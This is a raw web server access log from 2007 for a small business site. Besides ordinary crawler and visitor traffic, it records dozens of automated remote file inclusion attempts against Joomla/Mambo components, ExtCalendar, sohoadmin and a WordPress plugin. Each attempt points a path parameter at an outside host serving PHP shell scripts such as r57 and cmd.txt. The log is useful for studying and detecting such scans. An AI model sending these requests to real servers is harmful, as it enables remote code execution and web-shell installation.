209.59.197.59 - - [17/Aug/2007:11:56:09 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.197.59 - - [17/Aug/2007:11:56:09 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.197.59 - - [17/Aug/2007:11:56:48 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.197.59 - - [17/Aug/2007:11:56:48 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.197.59 - - [17/Aug/2007:11:56:50 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.59.197.59 - - [17/Aug/2007:11:56:50 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:43 -0700] "GET /contactus.html HTTP/1.0" 200 12521 "-" "Wget/1.10.2" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Wget/1.10.2" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:43 -0700] "GET /index.html HTTP/1.0" 200 10036 "http://www.projectpr.com/contactus.html" "Wget/1.10.2" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:44 -0700] "GET /aboutus.html HTTP/1.0" 200 9447 "http://www.projectpr.com/contactus.html" "Wget/1.10.2" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:44 -0700] "GET /services.html HTTP/1.0" 200 9306 "http://www.projectpr.com/contactus.html" "Wget/1.10.2" "www.projectpr.com"
207.114.187.114 - - [17/Aug/2007:11:59:44 -0700] "HEAD / HTTP/1.1" 200 0 "-" "-" "www.projectpr.com"
74.6.28.148 - - [17/Aug/2007:12:05:06 -0700] "GET /?S=A HTTP/1.0" 200 10036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.115.34.17 - - [17/Aug/2007:12:07:16 -0700] "GET /logs/access.log/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.115.34.17 - - [17/Aug/2007:12:07:21 -0700] "GET /logs/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:12:14:39 -0700] "GET /logs/access.log HTTP/1.1" 200 401390 "-" "Googlebot-Image/1.0" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:23:16 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 317 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:23:16 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:26:08 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:26:08 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:26:14 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:26:15 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
74.6.24.73 - - [17/Aug/2007:12:27:07 -0700] "GET /logs/?D=D HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:28:09 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:30:32 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:30:32 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.808" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:31:08 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:31:08 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
209.191.87.217 - - [17/Aug/2007:12:31:11 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfh1vmfvvfznavrapw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
209.191.87.217 - - [17/Aug/2007:12:31:13 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfh1vmfvvfznavrapw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:12:34:07 -0700] "GET /logs/access.log HTTP/1.1" 200 404695 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.71.73 - - [17/Aug/2007:12:37:49 -0700] "GET /navigation_bars/?M=D HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
64.203.136.14 - - [17/Aug/2007:12:43:13 -0700] "GET /!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:44:10 -0700] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:44:11 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:44:47 -0700] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.189.139.34 - - [17/Aug/2007:12:44:47 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.808" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:45:52 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
64.203.136.14 - - [17/Aug/2007:12:47:56 -0700] "GET /logs/access.log/!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.203.136.14 - - [17/Aug/2007:12:47:57 -0700] "GET /logs/!scanhttp://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:50:00 -0700] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:50:00 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:12:52:39 -0700] "GET /logs/access.log HTTP/1.1" 200 407172 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:54:35 -0700] "GET /logs/access.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:54:35 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.110.144.106 - - [17/Aug/2007:12:54:35 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:12:55:38 -0700] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:13:07:11 -0700] "GET /logs/access.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:13:07:12 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.71.208.150 - - [17/Aug/2007:13:07:12 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://partyraiser.interfree.it/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:13:15:34 -0700] "GET /logs/access.log HTTP/1.1" 200 409071 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
72.233.41.210 - - [17/Aug/2007:13:17:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://afltech.hyperphp.com/afltech? HTTP/1.1" 404 288 "-" "libwww-perl/5.808" "www.projectpr.com"
82.113.133.69 - - [17/Aug/2007:13:18:39 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.113.133.69 - - [17/Aug/2007:13:18:40 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.113.133.69 - - [17/Aug/2007:13:18:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:13:28:34 -0700] "GET /logs/access.log HTTP/1.1" 200 410198 "-" "Googlebot-Image/1.0" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:30:04 -0700] "GET /logs/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.803" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:30:04 -0700] "GET /login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:31:19 -0700] "GET /logs/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:31:19 -0700] "GET /login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.193.230.201 - - [17/Aug/2007:13:33:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dynamicwebdesign.be/test/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.193.230.201 - - [17/Aug/2007:13:33:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dynamicwebdesign.be/test/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:34:43 -0700] "GET /logs/access.log/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.67.153.151 - - [17/Aug/2007:13:35:08 -0700] "GET /logs/access.log/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.803" "www.projectpr.com"
62.146.114.42 - - [17/Aug/2007:13:38:53 -0700] "GET /logs/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.65" "www.projectpr.com"
62.146.114.42 - - [17/Aug/2007:13:38:54 -0700] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
66.196.97.159 - - [17/Aug/2007:13:44:51 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/qjpvveojb1q9zmk/vq HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
66.196.97.159 - - [17/Aug/2007:13:44:54 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/qjpvveojb1q9zmk/vq HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:13:46:13 -0700] "GET /logs/access.log HTTP/1.1" 200 412840 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:14:03:42 -0700] "GET /logs/access.log HTTP/1.1" 200 412975 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
88.191.47.180 - - [17/Aug/2007:14:11:19 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.digitalwalk.net/archives/archives.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.803" "www.projectpr.com"
62.146.114.42 - - [17/Aug/2007:14:12:55 -0700] "GET /logs/access.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.65" "www.projectpr.com"
216.120.233.16 - - [17/Aug/2007:14:21:14 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://nusay.5gbfree.com/os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:14:21:34 -0700] "GET /logs/access.log HTTP/1.1" 200 413841 "-" "Googlebot-Image/1.0" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:33 -0700] "GET /services.html HTTP/1.1" 200 9306 "http://images.google.com/imgres?imgurl=http://www.projectpr.com/images/desk_aerial_view.jpg&imgrefurl=http://www.projectpr.com/services.html&h=366&w=555&sz=202&hl=en&start=3&tbnid=q2xImEGgTrHv5M:&tbnh=88&tbnw=133&prev=/images%3Fq%3Ddesk%2Baerial%26svnum%3D10%26hl%3Den" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:33 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:33 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:33 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:33 -0700] "GET /sitebuilder/images/desk_aerial_view-100x79.jpg HTTP/1.1" 200 3331 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /sitebuilder/images/navbar-0-inactive-65062.png HTTP/1.1" 200 250 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /sitebuilder/images/navbar-3-active-65687.png HTTP/1.1" 200 298 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/services.html" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
207.237.15.146 - - [17/Aug/2007:14:22:34 -0700] "GET /images/desk_aerial_view.jpg HTTP/1.1" 200 206037 "http://images.google.com/imgres?imgurl=http://www.projectpr.com/images/desk_aerial_view.jpg&imgrefurl=http://www.projectpr.com/services.html&h=366&w=555&sz=202&tbnid=q2xImEGgTrHv5M:&tbnh=88&tbnw=133&hl=en&prev=/images%3Fq%3Ddesk%2Baerial%26svnum%3D10%26hl%3Den&frame=small" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.projectpr.com"
63.123.238.8 - - [17/Aug/2007:14:25:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
63.123.238.8 - - [17/Aug/2007:14:25:33 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:14:38:39 -0700] "GET /logs/access.log HTTP/1.1" 200 417727 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
80.58.205.53 - - [17/Aug/2007:14:40:59 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://watersportdeplaete.nl/catalog/n.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
80.58.205.53 - - [17/Aug/2007:14:41:02 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://watersportdeplaete.nl/catalog/n.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:14:55:30 -0700] "GET /logs/access.log HTTP/1.1" 200 418434 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.53.170.114 - - [17/Aug/2007:15:07:01 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.53.170.114 - - [17/Aug/2007:15:07:02 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.53.170.114 - - [17/Aug/2007:15:07:02 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:15:11:58 -0700] "GET /logs/access.log HTTP/1.1" 200 419414 "-" "Googlebot-Image/1.0" "www.projectpr.com"
80.58.205.53 - - [17/Aug/2007:15:12:47 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://watersportdeplaete.nl/catalog/n.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
66.230.204.130 - - [17/Aug/2007:15:19:18 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 309 "-" "libwww-perl/5.800" "www.projectpr.com"
66.230.204.130 - - [17/Aug/2007:15:19:49 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 309 "-" "libwww-perl/5.800" "www.projectpr.com"
66.230.204.130 - - [17/Aug/2007:15:20:11 -0700] "GET /logs/access.log///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.1" 404 311 "-" "libwww-perl/5.800" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:38 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ HTTP/1.0" 200 10036 "http://us.f376.mail.yahoo.com/ym/ShowLetter?box=%40B%40Bulk&MsgId=9304_0_4322_1159_863_0_4228_1471_438182301_oSOYkYn4Ur6Rg9SuJfSMZylawvafl_ZIeGfzYTPKxPtBv1o8lalEgwRxIjKJMUcouvOmooFcfHGmwA19Ec0QeX2U2Ud0T2OUguL9Wj7qId5ePTXRENKEeJlPTcVv.Nljn7qpApyP8Joipf_YxuWOo3tSBAtiTjSHjdQXPMHtwP0-&NEXT=1&inc=&num=&Idx=5&Search=&YY=79113&y5beta=yes&y5beta=yes&order=down&sort=date&pos=0&view=a&head=b" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.0" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.0" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /images/promo_mail.gif HTTP/1.0" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.0" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.0" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.0" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.0" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:42 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.0" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+VjVWPmg9aj9aPQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
195.69.210.2 - - [17/Aug/2007:15:26:51 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:15:28:27 -0700] "GET /logs/access.log HTTP/1.1" 200 423598 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
